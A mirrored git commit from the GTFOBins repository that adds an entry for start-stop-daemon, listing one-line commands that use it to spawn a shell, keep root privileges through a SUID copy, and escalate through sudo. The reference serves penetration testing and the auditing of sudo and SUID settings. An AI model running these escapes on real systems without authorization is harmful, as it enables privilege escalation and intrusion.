mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 22:40:10 +01:00
Add start-stop-daemon
This commit is contained in:
parent
ae79cfa550
commit
86e249e812
11
_gtfobins/start-stop-daemon.md
Normal file
11
_gtfobins/start-stop-daemon.md
Normal file
@ -0,0 +1,11 @@
|
|||||||
|
---
|
||||||
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: start-stop-daemon -n $RANDOM -S -x /bin/sh
|
||||||
|
suid:
|
||||||
|
- code: |
|
||||||
|
./start-stop-daemon -n $RANDOM -S -x /bin/sh -- -p
|
||||||
|
sudo:
|
||||||
|
- code: |
|
||||||
|
sudo start-stop-daemon -n $RANDOM -S -x /bin/sh
|
||||||
|
---
|
Loading…
Reference in New Issue
Block a user